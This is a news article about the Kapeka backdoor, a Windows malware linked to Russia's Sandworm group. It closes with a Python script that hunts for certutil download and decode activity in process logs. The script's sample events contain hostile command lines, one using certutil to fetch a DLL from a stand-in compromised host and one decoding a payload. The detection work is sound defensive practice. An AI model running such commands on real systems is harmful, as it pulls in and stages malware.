
Kapeka: the new cyber threat from Russia

Discovering and analyzing a new global cybersecurity challenge

The Kapeka backdoor, identified by WithSecure, is a threat to Windows, linked to the Sandworm group. It disguises itself as a Word add-in and handles malicious operations remotely.


Recently discovered by the Finnish company WithSecure, the Kapeka backdoor, which Microsoft tracks as KnuckleTouch, targets Windows operating systems. The threat, attributed to the Russian-affiliated Sandworm APT group, has been used mainly in Eastern Europe, with attacks recorded in Estonia and Ukraine since mid-2022. Kapeka is notable for its versatility: it can serve both as an initial foothold in a cyber-attack and as a persistent remote-access tool on victims' assets.

Technical details and use of Kapeka in cyber attacks

The Kapeka backdoor is implemented as a Windows DLL written in C++ with advanced command and control (C2) functionality. The malicious module disguises itself as a Microsoft Word add-in to avoid detection and runs multi-threaded so that it can handle commands received from the C2 server efficiently. Its capabilities include reading and writing files, executing shell commands, and managing itself by updating or uninstalling on command, which increases its stealth and its usefulness in cyber-espionage attacks or ransomware distribution.

Relationships between Kapeka and other malware families

WithSecure highlighted links between Kapeka and other well-known malware families such as GreyEnergy and BlackEnergy, indicating a possible evolution within Sandworm's strategy. Furthermore, a similarity in attack techniques was observed linking Kapeka to recent ransomware campaigns, such as that of Prestige. These associations suggest that Sandworm's arsenal is continually evolving, refining existing tools or developing new ones to increase the effectiveness of attacks.

Tips for protecting against the Kapeka threat

Microsoft has observed the use of "living-off-the-land" techniques, such as the certutil utility being used to retrieve the dropper from compromised websites, which underlines the importance of a proactive cybersecurity strategy. It is essential to keep systems updated and to review code and configurations regularly. Promoting security awareness within organizations is crucial to mitigating the risk of infection by malware like Kapeka and to protecting sensitive data and critical infrastructure.
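As an added illustration of the hunting angle, not taken from the article or from WithSecure or Microsoft, the following Python flags certutil invocations that download or decode files in process-creation logs; the key=value event format and the sample lines are constructed for the example:

```python
import re
from typing import Dict, List, Optional

# Constructed sample process-creation events in a hypothetical key=value
# format; none of these are real telemetry from the Kapeka campaign.
SAMPLE_EVENTS = [
    'ts=2024-04-23T10:01:02Z host=WS01 image=C:\\Windows\\System32\\certutil.exe '
    'cmdline="certutil -store my"',
    'ts=2024-04-23T10:02:15Z host=WS01 image=C:\\Windows\\System32\\certutil.exe '
    'cmdline="certutil -urlcache -split -f http://compromised.example/update.dat C:\\Temp\\w.dll"',
    'ts=2024-04-23T10:03:40Z host=WS02 image=C:\\Windows\\System32\\certutil.exe '
    'cmdline="certutil -decode C:\\Temp\\blob.txt C:\\Temp\\addin.dll"',
    'ts=2024-04-23T10:04:01Z host=WS02 image=C:\\Windows\\System32\\cmd.exe '
    'cmdline="cmd /c whoami"',
]

# certutil switches that turn it into a downloader or a decoder, the
# living-off-the-land behaviour worth alerting on.
DOWNLOAD_FLAGS = {"-urlcache", "-verifyctl"}
DECODE_FLAGS = {"-decode", "-decodehex"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
EVENT_RE = re.compile(r'image=(?P<image>\S+)\s+cmdline="(?P<cmdline>[^"]*)"')


def analyze_event(line: str) -> Optional[Dict[str, object]]:
    """Return a finding when certutil is used to download or decode, else None."""
    m = EVENT_RE.search(line)
    if not m:
        return None
    image = m.group("image").rsplit("\\", 1)[-1].lower()
    if image != "certutil.exe":
        return None
    cmdline = m.group("cmdline")
    flags = {tok.lower() for tok in cmdline.split() if tok.startswith("-")}
    url = URL_RE.search(cmdline)
    reasons: List[str] = []
    if flags & DOWNLOAD_FLAGS and url:
        reasons.append("certutil fetching a remote file")
    if flags & DECODE_FLAGS:
        reasons.append("certutil decoding a local payload")
    if not reasons:
        return None
    return {"line": line, "reasons": reasons, "url": url.group(0) if url else None}


def hunt(events: List[str]) -> List[Dict[str, object]]:
    """Run the rule over a batch of events and keep only the findings."""
    return [f for f in map(analyze_event, events) if f is not None]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["reasons"], finding["url"])
```

Legitimate certificate-store operations (the first sample line) pass through untouched, so the rule can be tuned on real process telemetry without alerting on every certutil run.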


04/23/2024 18:26

Marco Verro
